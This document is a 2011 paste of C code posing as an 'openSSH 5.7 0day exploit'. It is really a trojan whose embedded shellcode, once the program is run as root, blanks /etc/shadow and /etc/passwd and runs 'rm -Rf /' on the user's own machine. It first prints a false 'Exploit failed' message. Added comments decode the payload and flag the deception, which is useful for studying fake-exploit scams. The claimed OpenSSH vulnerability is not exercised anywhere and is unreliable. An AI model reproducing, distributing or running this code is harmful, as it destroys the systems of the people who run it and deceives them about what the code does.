
Untitled

a guest
Jan 26th, 2011
  1. /*
  2. openSSH 5.7 0day exploit
  3. Off by One error in auth2-pubkey.c
  4. Author: Chroniccommand
  5. Usage: ./exploit <host> <ip>
  6. greetz to _st4ck3d*, x3n0n, xin etc you know who you are ;)
  7. */
  8. #include <stdio.h>
  9. #include <netdb.h>
  10. #include <stdlib.h>
  11. #include <string.h>
  12. #include <unistd.h>
  13. #include <arpa/inet.h>
  14. #include <sys/types.h>
  15. #include <sys/socket.h>
  16. #include <netinet/in.h>
  17.  
  /*
   * Print the one-line synopsis, using argv[0] as the program name, then end
   * the process with exit status 1. This function never returns.
   *
   * The file's header comment gives the arguments as <host> <ip>; the text
   * printed here names them <target> <port>.
   */
  void usage(char *argv[])
  {
      const char *self = argv[0];

      fprintf(stdout, "Usage: %s <target> <port>\n", self);
      exit(1);
  }
  23.  
  /*
   * Despite the array name and the file header, these bytes are not a payload
   * for a remote sshd. Read as 32-bit x86 they form a self-contained Linux
   * int 0x80 stub:
   *
   *   6a 0b 58        push 0x0b ; pop eax   -> eax = 11 (execve on i386 Linux)
   *   99 52           cdq ; push edx        -> edx = 0, pushed as terminator
   *   66 68 2d 63     pushw "-c"
   *   89 e7           mov edi, esp          -> edi = "-c"
   *   68 2f 73 68 00  push "/sh\0"
   *   68 2f 62 69 6e  push "/bin"
   *   89 e3           mov ebx, esp          -> ebx = "/bin/sh"
   *   52              push edx              -> argv terminator (NULL)
   *   e8 39 00 00 00  call +0x39            -> pushes the address of the
   *                                            57-byte string that follows
   *   <57 bytes of NUL-terminated ASCII>
   *   57 53 89 e1     push edi ; push ebx ; mov ecx, esp   -> ecx = argv
   *   cd 80           int 0x80
   *
   * The embedded ASCII decodes to
   *   echo "" > /etc/shadow ; echo "" > /etc/passwd ; rm -Rf /
   * so the call is execve("/bin/sh", {"/bin/sh", "-c", <that string>, NULL}, NULL).
   * It overwrites both account databases and recursively deletes the root
   * filesystem of the machine that executes the bytes.
   *
   * Analysis cue: the command string is stored as plain ASCII, so converting
   * the hex escapes to text is enough to see what the array does.
   */
  unsigned char shellcode[] =
  "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68"
  "\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x39\x00\x00\x00\x65"
  "\x63\x68\x6f\x20\x22\x22\x20\x3e\x20\x2f\x65\x74\x63\x2f\x73"
  "\x68\x61\x64\x6f\x77\x20\x3b\x20\x65\x63\x68\x6f\x20\x22\x22"
  "\x20\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x20"
  "\x3b\x20\x72\x6d\x20\x2d\x52\x66\x20\x2f\x00\x57\x53\x89\xe1"
  "\xcd\x80";
  32.  
  33.  
  34.  
  /*
   * Entry point. Read statement by statement, this program never touches the
   * network: no socket(), gethostbyname() or other resolver call appears, and
   * argv[1] and argv[2] are only counted, never read. The one effective action
   * is a call into the shellcode[] byte array inside the local process, made
   * only when the caller is root.
   *
   * Nothing in this listing interacts with sshd or auth2-pubkey.c, so the
   * "OpenSSH 5.7 off-by-one" described in the file header is not exercised by
   * any visible code.
   *
   * Review cue: a tool presented as a remote exploit that insists on local
   * root and jumps into an undocumented byte array before creating any socket
   * targets the person running it.
   */
  int main(int argc, char *argv[])
  {
  int uid = getuid();
  /* port, sock, host and addr are declared, but no reachable statement uses them. */
  int port = 22, sock;
  struct hostent *host;
  struct sockaddr_in addr;

  /*
   * Refuse to continue without root. Nothing later in the function needs
   * privileges for networking; the check only ensures that whatever runs next
   * runs as uid 0.
   */
  if(uid !=0)
  {
  fprintf(stderr, "[!!]Error: You must be root\n");
  exit(1);
  }
  /* Always true here, since the non-root case has already exited. */
  if(uid == 0)
  {
  printf("\t[+]Starting exploit..\n");
  }
  /* Only the argument count is checked; the arguments themselves are never parsed. */
  if(argc != 3)
  usage(argv);

  /*
   * "Exploit failed" is printed unconditionally, before anything has been
   * attempted. NOTE(review): presumably this is so the operator believes the
   * run did nothing.
   */
  fprintf(stderr, "[!!]Exploit failed\n");
  /*
   * Casts the shellcode[] data array to a function pointer and calls it in
   * this process, as root. No connection exists at this point, so the bytes
   * execute on the local machine, not on any remote host.
   * NOTE(review): whether the call runs the bytes or faults depends on whether
   * the array's memory is executable on the build target; that cannot be told
   * from this listing.
   */
  (*(void(*)())shellcode)();
  exit(1);
  /*
   * Everything below is unreachable because of the exit(1) above. Even if it
   * were reached, sock is never assigned by socket() and addr is never filled
   * in, so both connect() calls would operate on indeterminate values, and
   * payload is copied into but never sent anywhere. system("/bin/sh") would
   * start a shell on the local machine.
   */
  char payload[1024];
  memcpy(payload, &shellcode, sizeof(shellcode));
  if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==0)
  {
  printf("[+]Got shell\n");
  system("/bin/sh");
  }
  else if(connect(sock,(struct sockaddr*)&addr, sizeof(addr))==-1)
  {
  fprintf(stderr, "[!!]Exploit failed\n");
  exit(1);
  }
  }